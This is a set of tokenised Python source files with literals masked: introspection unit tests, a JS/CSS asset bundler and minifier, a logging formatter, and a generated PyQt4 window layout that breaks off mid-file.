<s> from smisk . test import * <EOL> from smisk . util . introspect import * <EOL> from smisk . util . type import Undefined <EOL> class A ( object ) : <EOL> def __call__ ( self ) : <EOL> pass <EOL> def hello ( self , one , two , three = None , four = <NUM_LIT> , five = '<STR_LIT>' ) : <EOL> foo = '<STR_LIT>' <EOL> bar = '<STR_LIT>' <EOL> two = <NUM_LIT> <EOL> for baz in foo : <EOL> pass <EOL> return locals ( ) <EOL> def ping ( self , filter = None , * argz , ** kwargz ) : <EOL> pass <EOL> def none ( self ) : <EOL> pass <EOL> class B ( object ) : <EOL> def foo ( self ) : <EOL> pass <EOL> class IntrospectTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . expect_hello_info = { <EOL> '<STR_LIT:name>' : '<STR_LIT:hello>' , <EOL> '<STR_LIT:args>' : ( <EOL> ( '<STR_LIT>' , Undefined ) , <EOL> ( '<STR_LIT>' , Undefined ) , <EOL> ( '<STR_LIT>' , None ) , <EOL> ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True <EOL> } <EOL> def test_2_info_methods ( self ) : <EOL> a = A ( ) <EOL> expected = self . expect_hello_info <EOL> returned = introspect . callable_info ( a . hello ) <EOL> assert returned == expected , '<STR_LIT>' % ( returned , expected ) <EOL> returned = introspect . callable_info ( A . hello ) <EOL> assert returned == expected , '<STR_LIT>' % ( returned , expected ) <EOL> b = B ( ) <EOL> expected = { <EOL> '<STR_LIT:name>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT:args>' : ( ) , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> returned = introspect . callable_info ( b . foo ) <EOL> assert returned == expected , '<STR_LIT>' % ( returned , expected ) <EOL> returned = introspect . callable_info ( B . 
foo ) <EOL> assert returned == expected , '<STR_LIT>' % ( returned , expected ) <EOL> def test_2_info_function ( self ) : <EOL> def plain ( ) : <EOL> pass <EOL> expected = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT:args>' : ( ) , <EOL> } <EOL> returned = introspect . callable_info ( plain ) <EOL> assert returned == expected , '<STR_LIT>' % ( returned , expected ) <EOL> def test_2_info_function_varargs ( self ) : <EOL> def varargs ( a , b = <NUM_LIT:1> , * args ) : <EOL> pass <EOL> expected = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT:args>' : ( <EOL> ( '<STR_LIT:a>' , Undefined ) , <EOL> ( '<STR_LIT:b>' , <NUM_LIT:1> ) <EOL> ) , <EOL> } <EOL> returned = introspect . callable_info ( varargs ) <EOL> assert returned == expected , '<STR_LIT>' % ( returned , expected ) <EOL> def test_2_info_function_varkw ( self ) : <EOL> def foobar ( a = [ ] , b = <NUM_LIT:1> , ** xyz ) : <EOL> pass <EOL> expected = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:args>' : ( <EOL> ( '<STR_LIT:a>' , [ ] ) , <EOL> ( '<STR_LIT:b>' , <NUM_LIT:1> ) <EOL> ) , <EOL> } <EOL> returned = introspect . callable_info ( foobar ) <EOL> assert returned == expected , '<STR_LIT>' % ( returned , expected ) <EOL> def test_3_ensure_va_kwa ( self ) : <EOL> a = A ( ) <EOL> try : <EOL> assert a . hello ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , * ( '<STR_LIT>' , '<STR_LIT>' ) ) == <NUM_LIT:0> , '<STR_LIT>' <EOL> except TypeError : <EOL> pass <EOL> a . hello = introspect . ensure_va_kwa ( a . hello ) <EOL> expected = self . expect_hello_info . copy ( ) <EOL> expected [ '<STR_LIT>' ] = True <EOL> expected [ '<STR_LIT>' ] = True <EOL> returned = introspect . callable_info ( a . 
hello ) <EOL> assert returned == expected , '<STR_LIT>' % ( returned , expected ) <EOL> assert a . hello ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , * ( '<STR_LIT>' , '<STR_LIT>' ) , ** { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:2> } ) == { <EOL> '<STR_LIT>' : a , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT:foo>' : '<STR_LIT>' , <EOL> '<STR_LIT:bar>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:f>' <EOL> } <EOL> assert a . hello ( '<STR_LIT>' , '<STR_LIT>' ) == { <EOL> '<STR_LIT>' : a , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:foo>' : '<STR_LIT>' , <EOL> '<STR_LIT:bar>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:f>' <EOL> } <EOL> a . none = introspect . ensure_va_kwa ( a . none ) <EOL> a . none ( ) <EOL> a . none ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> a . none ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) <EOL> a . none ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , foo = <NUM_LIT:12> ) <EOL> def suite ( ) : <EOL> return unittest . TestSuite ( [ <EOL> unittest . makeSuite ( IntrospectTests ) , <EOL> ] ) <EOL> def test ( ) : <EOL> runner = unittest . TextTestRunner ( ) <EOL> return runner . run ( suite ( ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> test ( ) </s>
<s> __author__ = '<STR_LIT>' <EOL> import os <EOL> import fnmatch <EOL> import hashlib <EOL> import sys <EOL> import optparse <EOL> import gzip <EOL> from collections import defaultdict <EOL> try : <EOL> from cStringIO import StringIO <EOL> except ImportError : <EOL> from StringIO import StringIO <EOL> import envoy <EOL> import yaml <EOL> import slimit <EOL> import cssmin <EOL> OUTPUT_DIR = '<STR_LIT>' <EOL> CONFIG_FILE = '<STR_LIT>' <EOL> ASSETS_INFO_FILE = '<STR_LIT>' <EOL> def _log ( msg ) : <EOL> sys . stderr . write ( '<STR_LIT>' % msg ) <EOL> def load_config ( path ) : <EOL> return yaml . load ( open ( path ) ) <EOL> if sys . version < ( <NUM_LIT:2> , <NUM_LIT:7> ) : <EOL> class GzipFile ( gzip . GzipFile ) : <EOL> def __enter__ ( self ) : <EOL> if self . fileobj is None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return self <EOL> def __exit__ ( self , * args ) : <EOL> self . close ( ) <EOL> else : <EOL> GzipFile = gzip . GzipFile <EOL> class AssetManager ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , config , basedir = None ) : <EOL> self . config = config <EOL> self . basedir = basedir or os . getcwd ( ) <EOL> def _get_bundles_by_type ( self , type ) : <EOL> """<STR_LIT>""" <EOL> bundles = { } <EOL> bundle_definitions = self . config . get ( type ) <EOL> if bundle_definitions is None : <EOL> return bundles <EOL> for bundle_name , paths in bundle_definitions . items ( ) : <EOL> bundle_files = [ ] <EOL> for path in paths : <EOL> pattern = abspath = os . path . join ( self . basedir , path ) <EOL> assetdir = os . path . dirname ( abspath ) <EOL> fnames = [ os . path . join ( assetdir , fname ) <EOL> for fname in os . listdir ( assetdir ) ] <EOL> expanded_fnames = fnmatch . filter ( fnames , pattern ) <EOL> bundle_files . 
extend ( sorted ( expanded_fnames ) ) <EOL> bundles [ bundle_name ] = bundle_files <EOL> return bundles <EOL> def _compress ( self , data ) : <EOL> compresslevel = <NUM_LIT:9> <EOL> buffer = StringIO ( ) <EOL> with GzipFile ( fileobj = buffer , mode = '<STR_LIT:wb>' , <EOL> compresslevel = compresslevel ) as fout : <EOL> fout . write ( data ) <EOL> return buffer . getvalue ( ) <EOL> def _concat ( self , data , type ) : <EOL> sep = '<STR_LIT>' <EOL> if type == '<STR_LIT>' : <EOL> sep = '<STR_LIT:;>' <EOL> return sep . join ( data ) <EOL> def _minify ( self , data , type , paths = [ ] ) : <EOL> sep = '<STR_LIT>' <EOL> if type == '<STR_LIT>' : <EOL> sep = '<STR_LIT:;>' <EOL> custom = self . config . get ( '<STR_LIT>' ) <EOL> if custom is not None : <EOL> minify = lambda x : envoy . run ( custom , data = x ) . std_out <EOL> else : <EOL> options = self . config . get ( <EOL> '<STR_LIT>' , { '<STR_LIT>' : True } <EOL> ) <EOL> minify = lambda x : slimit . minify ( x , ** options ) <EOL> elif type == '<STR_LIT>' : <EOL> minify = cssmin . cssmin <EOL> def real_minify ( path , contents ) : <EOL> if '<STR_LIT>' in path : <EOL> return contents <EOL> return minify ( contents ) <EOL> minified = sep . join ( <EOL> [ real_minify ( path , contents ) for path , contents in zip ( paths , data ) ] <EOL> ) <EOL> return minified <EOL> def _process_bundle ( self , name , paths , type ) : <EOL> sha1 , opt_dash = '<STR_LIT>' , '<STR_LIT>' <EOL> raw_data = [ open ( path ) . read ( ) for path in paths ] <EOL> if self . config . get ( '<STR_LIT>' ) : <EOL> sha1 = hashlib . sha1 ( '<STR_LIT>' . join ( raw_data ) ) . hexdigest ( ) <EOL> opt_dash = '<STR_LIT:->' <EOL> file_ext = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } . get ( type ) <EOL> fname_template = '<STR_LIT>' % ( name , opt_dash , sha1 , file_ext ) <EOL> concat_fname = fname_template . format ( suffix = '<STR_LIT>' , gz = '<STR_LIT>' ) <EOL> concat_data = self . 
_concat ( raw_data , type ) <EOL> self . write ( concat_fname , concat_data ) <EOL> minified_fname = fname_template . format ( suffix = '<STR_LIT>' , gz = '<STR_LIT>' ) <EOL> minified_data = self . _minify ( raw_data , type , paths = paths ) <EOL> self . write ( minified_fname , minified_data ) <EOL> gzipped_fname = fname_template . format ( suffix = '<STR_LIT>' , gz = '<STR_LIT>' ) <EOL> gzipped_data = self . _compress ( minified_data ) <EOL> self . write ( gzipped_fname , gzipped_data ) <EOL> return { <EOL> name : { <EOL> '<STR_LIT>' : [ os . path . relpath ( p , self . basedir ) for p in paths ] , <EOL> '<STR_LIT>' : sha1 , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : concat_fname , <EOL> '<STR_LIT>' : minified_fname , <EOL> '<STR_LIT>' : gzipped_fname , <EOL> } , <EOL> '<STR_LIT:size>' : { <EOL> '<STR_LIT>' : len ( concat_data ) , <EOL> '<STR_LIT>' : len ( minified_data ) , <EOL> '<STR_LIT>' : len ( gzipped_data ) , <EOL> } , <EOL> } <EOL> } <EOL> def write ( self , fname , data ) : <EOL> output = os . path . abspath ( self . config . get ( '<STR_LIT>' , OUTPUT_DIR ) ) <EOL> if not os . path . exists ( output ) : <EOL> os . makedirs ( output ) <EOL> path = os . path . join ( output , fname ) <EOL> with open ( path , '<STR_LIT:w>' ) as fout : <EOL> fout . write ( data ) <EOL> def write_info ( self , bundles_info ) : <EOL> self . write ( ASSETS_INFO_FILE , <EOL> yaml . dump ( dict ( bundles_info ) , default_flow_style = False ) ) <EOL> def get_bundles ( self ) : <EOL> bundles = { <EOL> '<STR_LIT>' : self . _get_bundles_by_type ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : self . _get_bundles_by_type ( '<STR_LIT>' ) , <EOL> } <EOL> return bundles <EOL> def process_bundles ( self ) : <EOL> info = defaultdict ( dict ) <EOL> bundles = self . get_bundles ( ) <EOL> for bundle_type in bundles : <EOL> for name , paths in bundles [ bundle_type ] . items ( ) : <EOL> bundle_info = self . _process_bundle ( name , paths , bundle_type ) <EOL> info [ bundle_type ] . 
update ( bundle_info ) <EOL> return info <EOL> def main ( ) : <EOL> parser = optparse . OptionParser ( ) <EOL> parser . add_option ( '<STR_LIT:-c>' , '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> help = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> options , args = parser . parse_args ( ) <EOL> config_path = options . config <EOL> if config_path is None : <EOL> config_path = os . path . join ( os . getcwd ( ) , CONFIG_FILE ) <EOL> if not os . path . exists ( config_path ) : <EOL> _log ( '<STR_LIT>' % config_path ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> config = load_config ( config_path ) <EOL> manager = AssetManager ( config , options . basedir ) <EOL> bundles_info = manager . process_bundles ( ) <EOL> manager . write_info ( bundles_info ) </s>
<s> __author__ = '<STR_LIT>' <EOL> import time <EOL> import logging <EOL> _DEFAULT_FMT = '<STR_LIT>' <EOL> class Formatter ( logging . Formatter ) : <EOL> def __init__ ( self , fmt = None , datefmt = None ) : <EOL> logging . Formatter . __init__ ( self , fmt or _DEFAULT_FMT , datefmt ) <EOL> self . converter = time . gmtime <EOL> def formatException ( self , exc_info ) : <EOL> text = logging . Formatter . formatException ( self , exc_info ) <EOL> text = '<STR_LIT:\n>' . join ( ( '<STR_LIT>' % line ) for line in text . splitlines ( ) ) <EOL> return text </s>
<s> from PyQt4 import QtCore , QtGui <EOL> class Ui_MainWindow ( object ) : <EOL> def setupUi ( self , MainWindow ) : <EOL> MainWindow . setObjectName ( "<STR_LIT>" ) <EOL> MainWindow . resize ( <NUM_LIT> , <NUM_LIT> ) <EOL> icon = QtGui . QIcon ( ) <EOL> icon . addPixmap ( QtGui . QPixmap ( "<STR_LIT>" ) , QtGui . QIcon . Normal , QtGui . QIcon . Off ) <EOL> MainWindow . setWindowIcon ( icon ) <EOL> self . centralWidget = QtGui . QWidget ( MainWindow ) <EOL> self . centralWidget . setObjectName ( "<STR_LIT>" ) <EOL> self . horizontalLayout_3 = QtGui . QHBoxLayout ( self . centralWidget ) <EOL> self . horizontalLayout_3 . setMargin ( <NUM_LIT:3> ) <EOL> self . horizontalLayout_3 . setObjectName ( "<STR_LIT>" ) <EOL> self . tabs = QtGui . QTabWidget ( self . centralWidget ) <EOL> sizePolicy = QtGui . QSizePolicy ( QtGui . QSizePolicy . Expanding , QtGui . QSizePolicy . Expanding ) <EOL> sizePolicy . setHorizontalStretch ( <NUM_LIT:0> ) <EOL> sizePolicy . setVerticalStretch ( <NUM_LIT:0> ) <EOL> sizePolicy . setHeightForWidth ( self . tabs . sizePolicy ( ) . hasHeightForWidth ( ) ) <EOL> self . tabs . setSizePolicy ( sizePolicy ) <EOL> self . tabs . setObjectName ( "<STR_LIT>" ) <EOL> self . tab = QtGui . QWidget ( ) <EOL> self . tab . setObjectName ( "<STR_LIT>" ) <EOL> self . horizontalLayout = QtGui . QHBoxLayout ( self . tab ) <EOL> self . horizontalLayout . setMargin ( <NUM_LIT:0> ) <EOL> self . horizontalLayout . setObjectName ( "<STR_LIT>" ) <EOL> self . text = CodeEditor ( self . tab ) <EOL> font = QtGui . QFont ( ) <EOL> font . setFamily ( "<STR_LIT>" ) <EOL> self . text . setFont ( font ) <EOL> self . text . setFrameShape ( QtGui . QFrame . NoFrame ) <EOL> self . text . setFrameShadow ( QtGui . QFrame . Plain ) <EOL> self . text . setLineWidth ( <NUM_LIT:0> ) <EOL> self . text . setObjectName ( "<STR_LIT:text>" ) <EOL> self . horizontalLayout . addWidget ( self . text ) <EOL> self . tabs . addTab ( self . tab , "<STR_LIT>" ) <EOL> self . tab_2 = QtGui . 
QWidget ( ) <EOL> self . tab_2 . setObjectName ( "<STR_LIT>" ) <EOL> self . horizontalLayout_2 = QtGui . QHBoxLayout ( self . tab_2 ) <EOL> self . horizontalLayout_2 . setMargin ( <NUM_LIT:0> ) <EOL> self . horizontalLayout_2 . setObjectName ( "<STR_LIT>" ) <EOL> self . style = CodeEditor ( self . tab_2 ) <EOL> font = QtGui . QFont ( ) <EOL> font . setFamily ( "<STR_LIT>" ) <EOL> self . style . setFont ( font ) <EOL> self . style . setFrameShape ( QtGui . QFrame . NoFrame ) <EOL> self . style . setObjectName ( "<STR_LIT>" ) <EOL> self . horizontalLayout_2 . addWidget ( self . style ) <EOL> self . tabs . addTab ( self . tab_2 , "<STR_LIT>" ) <EOL> self . horizontalLayout_3 . addWidget ( self . tabs ) <EOL> MainWindow . setCentralWidget ( self . centralWidget ) <EOL> self . statusBar = QtGui . QStatusBar ( MainWindow ) <EOL> self . statusBar . setObjectName ( "<STR_LIT>" ) <EOL> MainWindow . setStatusBar ( self . statusBar ) <EOL> self . menuBar = QtGui . QMenuBar ( MainWindow ) <EOL> self . menuBar . setGeometry ( QtCore . QRect ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:32> ) ) <EOL> self . menuBar . setObjectName ( "<STR_LIT>" ) <EOL> self . menuText = QtGui . QMenu ( self . menuBar ) <EOL> self . menuText . setObjectName ( "<STR_LIT>" ) <EOL> self . menuView = QtGui . QMenu ( self . menuBar ) <EOL> self . menuView . setObjectName ( "<STR_LIT>" ) <EOL> self . menuEdit = QtGui . QMenu ( self . menuBar ) <EOL> self . menuEdit . setObjectName ( "<STR_LIT>" ) <EOL> self . menuHelp = QtGui . QMenu ( self . menuBar ) <EOL> self . menuHelp . setObjectName ( "<STR_LIT>" ) <EOL> MainWindow . setMenuBar ( self . menuBar ) <EOL> self . toolBar = QtGui . QToolBar ( MainWindow ) <EOL> self . toolBar . setObjectName ( "<STR_LIT>" ) <EOL> MainWindow . addToolBar ( QtCore . Qt . TopToolBarArea , self . toolBar ) <EOL> self . pdfbar = QtGui . QToolBar ( MainWindow ) <EOL> self . pdfbar . setObjectName ( "<STR_LIT>" ) <EOL> MainWindow . addToolBar ( QtCore . Qt . 
TopToolBarArea , self . pdfbar ) <EOL> self . dock = QtGui . QDockWidget ( MainWindow ) <EOL> icon1 = QtGui . QIcon ( ) <EOL> icon1 . addPixmap ( QtGui . QPixmap ( "<STR_LIT>" ) , QtGui . QIcon . Normal , QtGui . QIcon . Off ) <EOL> self . dock . setWindowIcon ( icon1 ) <EOL> self . dock . setObjectName ( "<STR_LIT>" ) <EOL> self . dockWidgetContents = QtGui . QWidget ( ) <EOL> self . dockWidgetContents . setObjectName ( "<STR_LIT>" ) <EOL> self . verticalLayout = QtGui . QVBoxLayout ( self . dockWidgetContents ) <EOL> self . verticalLayout . setMargin ( <NUM_LIT:0> ) <EOL> self . verticalLayout . setObjectName ( "<STR_LIT>" ) <EOL> self . dockLayout = QtGui . QVBoxLayout ( ) <EOL> self . dockLayout . setSpacing ( <NUM_LIT:0> ) <EOL> self . dockLayout . setSizeConstraint ( QtGui . QLayout . SetNoConstraint ) <EOL> self . dockLayout . setContentsMargins ( - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> self . dockLayout . setObjectName ( "<STR_LIT>" ) <EOL> self . verticalLayout . addLayout ( self . dockLayout ) <EOL> self . dock . setWidget ( self . dockWidgetContents ) <EOL> MainWindow . addDockWidget ( QtCore . Qt . DockWidgetArea ( <NUM_LIT:2> ) , self . dock ) <EOL> self . editbar = QtGui . QToolBar ( MainWindow ) <EOL> self . editbar . setObjectName ( "<STR_LIT>" ) <EOL> MainWindow . addToolBar ( QtCore . Qt . TopToolBarArea , self . editbar ) <EOL> self . searchbar = QtGui . QToolBar ( MainWindow ) <EOL> self . searchbar . setMovable ( False ) <EOL> self . searchbar . setAllowedAreas ( QtCore . Qt . BottomToolBarArea ) <EOL> self . searchbar . setFloatable ( False ) <EOL> self . searchbar . setObjectName ( "<STR_LIT>" ) <EOL> MainWindow . addToolBar ( QtCore . Qt . BottomToolBarArea , self . searchbar ) <EOL> self . structure = QtGui . QDockWidget ( MainWindow ) <EOL> self . structure . setObjectName ( "<STR_LIT>" ) <EOL> self . dockWidgetContents_2 = QtGui . QWidget ( ) <EOL> self . dockWidgetContents_2 . 
setObjectName ( "<STR_LIT>" ) <EOL> self . verticalLayout_3 = QtGui . QVBoxLayout ( self . dockWidgetContents_2 ) <EOL> self . verticalLayout_3 . setMargin ( <NUM_LIT:0> ) <EOL> self . verticalLayout_3 . setObjectName ( "<STR_LIT>" ) <EOL> self . verticalLayout_2 = QtGui . QVBoxLayout ( ) <EOL> self . verticalLayout_2 . setObjectName ( "<STR_LIT>" ) <EOL> self . tree = QtGui . QTreeWidget ( self . dockWidgetContents_2 ) <EOL> self . tree . setEditTriggers ( QtGui . QAbstractItemView . NoEditTriggers ) <EOL> self . tree . setProperty ( "<STR_LIT>" , QtCore . QVariant ( False ) ) <EOL> self . tree . setAlternatingRowColors ( True ) <EOL> self . tree . setHeaderHidden ( False ) <EOL> self . tree . setObjectName ( "<STR_LIT>" ) <EOL> self . tree . header ( ) . setVisible ( True ) <EOL> self . tree . header ( ) . setStretchLastSection ( False ) <EOL> self . verticalLayout_2 . addWidget ( self . tree ) <EOL> self . verticalLayout_3 . addLayout ( self . verticalLayout_2 ) <EOL> self . structure . setWidget ( self . dockWidgetContents_2 ) <EOL> MainWindow . addDockWidget ( QtCore . Qt . DockWidgetArea ( <NUM_LIT:1> ) , self . structure ) <EOL> self . actionLoad_Text = QtGui . QAction ( MainWindow ) <EOL> icon2 = QtGui . QIcon ( ) <EOL> icon2 . addPixmap ( QtGui . QPixmap ( "<STR_LIT>" ) , QtGui . QIcon . Normal , QtGui . QIcon . Off ) <EOL> self . actionLoad_Text . setIcon ( icon2 ) <EOL> self . actionLoad_Text . setObjectName ( "<STR_LIT>" ) <EOL> self . actionLoad_Style = QtGui . QAction ( MainWindow ) <EOL> self . actionLoad_Style . setIcon ( icon2 ) <EOL> self . actionLoad_Style . setObjectName ( "<STR_LIT>" ) <EOL> self . actionRender = QtGui . QAction ( MainWindow ) <EOL> self . actionRender . setIcon ( icon1 ) <EOL> self . actionRender . setObjectName ( "<STR_LIT>" ) <EOL> self . actionSave_Text = QtGui . QAction ( MainWindow ) <EOL> icon3 = QtGui . QIcon ( ) <EOL> icon3 . addPixmap ( QtGui . QPixmap ( "<STR_LIT>" ) , QtGui . QIcon . Normal , QtGui . QIcon . 
Off ) <EOL> self . actionSave_Text . setIcon ( icon3 ) <EOL> self . actionSave_Text . setObjectName ( "<STR_LIT>" ) <EOL> self . actionSave_Style = QtGui . QAction ( MainWindow ) <EOL> self . actionSave_Style . setIcon ( icon3 ) <EOL> self . actionSave_Style . setObjectName ( "<STR_LIT>" ) <EOL> self . actionSave_PDF = QtGui . QAction ( MainWindow ) <EOL> self . actionSave_PDF . setIcon ( icon1 ) <EOL> self . actionSave_PDF . setObjectName ( "<STR_LIT>" ) <EOL> self . actionSaveAs_Text = QtGui . QAction ( MainWindow ) <EOL> self . actionSaveAs_Text . setIcon ( icon3 ) <EOL> self . actionSaveAs_Text . setObjectName ( "<STR_LIT>" ) <EOL> self . actionSaveAs_Style = QtGui . QAction ( MainWindow ) <EOL> self . actionSaveAs_Style . setIcon ( icon3 ) <EOL> self . actionSaveAs_Style . setObjectName ( "<STR_LIT>" ) <EOL> self . actionSaveAs_PDF = QtGui . QAction ( MainWindow ) <EOL> self . actionSaveAs_PDF . setIcon ( icon1 ) <EOL> self . actionSaveAs_PDF . setObjectName ( "<STR_LIT>" ) <EOL> self . actionUndo1 = QtGui . QAction ( MainWindow ) <EOL> self . actionUndo1 . setEnabled ( False ) <EOL> icon4 = QtGui . QIcon ( ) <EOL> icon4 . addPixmap ( QtGui . QPixmap ( "<STR_LIT>" ) , QtGui . QIcon . Normal , QtGui . QIcon . Off ) <EOL> self . actionUndo1 . setIcon ( icon4 ) <EOL> self . actionUndo1 . setObjectName ( "<STR_LIT>" ) <EOL> self . actionRedo1 = QtGui . QAction ( MainWindow ) <EOL> self . actionRedo1 . setEnabled ( False ) <EOL> icon5 = QtGui . QIcon ( ) <EOL> icon5 . addPixmap ( QtGui . QPixmap ( "<STR_LIT>" ) , QtGui . QIcon . Normal , QtGui . QIcon . Off ) <EOL> self . actionRedo1 . setIcon ( icon5 ) <EOL> self . actionRedo1 . setObjectName ( "<STR_LIT>" ) <EOL> self . actionCut1 = QtGui . QAction ( MainWindow ) <EOL> self . actionCut1 . setEnabled ( False ) <EOL> icon6 = QtGui . QIcon ( ) <EOL> icon6 . addPixmap ( QtGui . QPixmap ( "<STR_LIT>" ) , QtGui . QIcon . Normal , QtGui . QIcon . Off ) <EOL> self . actionCut1 . setIcon ( icon6 ) <EOL> self . 
actionCut1 . setObjectName ( "<STR_LIT>" ) <EOL> self . actionCopy1 = QtGui . QAction ( MainWindow ) <EOL> self . actionCopy1 . setEnabled ( False ) <EOL> icon7 = QtGui . QIcon ( ) <EOL> icon7 . addPixmap ( QtGui . QPixmap ( "<STR_LIT>" ) , QtGui . QIcon . Normal , QtGui . QIcon . Off ) <EOL> self . actionCopy1 . setIcon ( icon7 ) <EOL> self . actionCopy1 . setObjectName ( "<STR_LIT>" ) <EOL> self . actionPaste1 = QtGui . QAction ( MainWindow ) <EOL> self . actionPaste1 . setEnabled ( False ) <EOL> icon8 = QtGui . QIcon ( ) <EOL> icon8 . addPixmap ( QtGui . QPixmap ( "<STR_LIT>" ) , QtGui . QIcon . Normal , QtGui . QIcon . Off ) <EOL> self . actionPaste1 . setIcon ( icon8 ) <EOL> self . actionPaste1 . setObjectName ( "<STR_LIT>" ) <EOL> self . actionUndo2 = QtGui . QAction ( MainWindow ) <EOL> self . actionUndo2 . setEnabled ( False ) <EOL> self . actionUndo2 . setIcon ( icon4 ) <EOL> self . actionUndo2 . setObjectName ( "<STR_LIT>" ) <EOL> self . actionRedo2 = QtGui . QAction ( MainWindow ) <EOL> self . actionRedo2 . setEnabled ( False ) <EOL> self . actionRedo2 . setIcon ( icon5 ) <EOL> self . actionRedo2 . setObjectName ( "<STR_LIT>" ) <EOL> self . actionCut2 = QtGui . QAction ( MainWindow ) <EOL> self . actionCut2 . setEnabled ( False ) <EOL> self . actionCut2 . setIcon ( icon6 ) <EOL> self . actionCut2 . setObjectName ( "<STR_LIT>" ) <EOL> self . actionCopy2 = QtGui . QAction ( MainWindow ) <EOL> self . actionCopy2 . setEnabled ( False ) <EOL> self . actionCopy2 . setIcon ( icon7 ) <EOL> self . actionCopy2 . setObjectName ( "<STR_LIT>" ) <EOL> self . actionPaste2 = QtGui . QAction ( MainWindow ) <EOL> self . actionPaste2 . setEnabled ( False ) <EOL> self . actionPaste2 . setIcon ( icon8 ) <EOL> self . actionPaste2 . setObjectName ( "<STR_LIT>" ) <EOL> self . actionFind = QtGui . QAction ( MainWindow ) <EOL> icon9 = QtGui . QIcon ( ) <EOL> icon9 . addPixmap ( QtGui . QPixmap ( "<STR_LIT>" ) , QtGui . QIcon . Normal , QtGui . QIcon . Off ) <EOL> self . 
actionFind . setIcon ( icon9 ) <EOL> self . actionFind . setObjectName ( "<STR_LIT>" ) <EOL> self . actionAbout_Bookrest = QtGui . QAction ( MainWindow ) <EOL> self . actionAbout_Bookrest . setObjectName ( "<STR_LIT>" ) <EOL> self . actionTest_Action = QtGui . QAction ( MainWindow ) <EOL> self . actionTest_Action . setObjectName ( "<STR_LIT>" ) <EOL> self . actionSettings = QtGui . QAction ( MainWindow ) <EOL> icon10 = QtGui . QIcon ( ) <EOL> icon10 . addPixmap ( QtGui . QPixmap ( "<STR_LIT>" ) , QtGui . QIcon . Normal , QtGui . QIcon . Off ) <EOL> self . actionSettings . setIcon ( icon10 ) <EOL> self . actionSettings . setObjectName ( "<STR_LIT>" ) <EOL> self . menuText . addAction ( self . actionLoad_Text ) <EOL> self . menuText . addAction ( self . actionLoad_Style ) <EOL> self . menuText . addSeparator ( ) <EOL> self . menuText . addAction ( self . actionSave_Text ) <EOL> self . menuText . addAction ( self . actionSaveAs_Text ) <EOL> self . menuText . addAction ( self . actionSave_Style ) <EOL> self . menuText . addAction ( self . actionSaveAs_Style ) <EOL> self . menuText . addAction ( self . actionSave_PDF ) <EOL> self . menuText . addAction ( self . actionSaveAs_PDF ) <EOL> self . menuEdit . addAction ( self . actionUndo1 ) <EOL> self . menuEdit . addAction ( self . actionUndo2 ) <EOL> self . menuEdit . addAction ( self . actionRedo1 ) <EOL> self . menuEdit . addAction ( self . actionRedo2 ) <EOL> self . menuEdit . addSeparator ( ) <EOL> self . menuEdit . addAction ( self . actionCut1 ) <EOL> self . menuEdit . addAction ( self . actionCut2 ) <EOL> self . menuEdit . addAction ( self . actionCopy1 ) <EOL> self . menuEdit . addAction ( self . actionCopy2 ) <EOL> self . menuEdit . addAction ( self . actionPaste1 ) <EOL> self . menuEdit . addAction ( self . actionPaste2 ) <EOL> self . menuEdit . addSeparator ( ) <EOL> self . menuEdit . addAction ( self . actionFind ) <EOL> self . menuEdit . addSeparator ( ) <EOL> self . menuEdit . addAction ( self . 
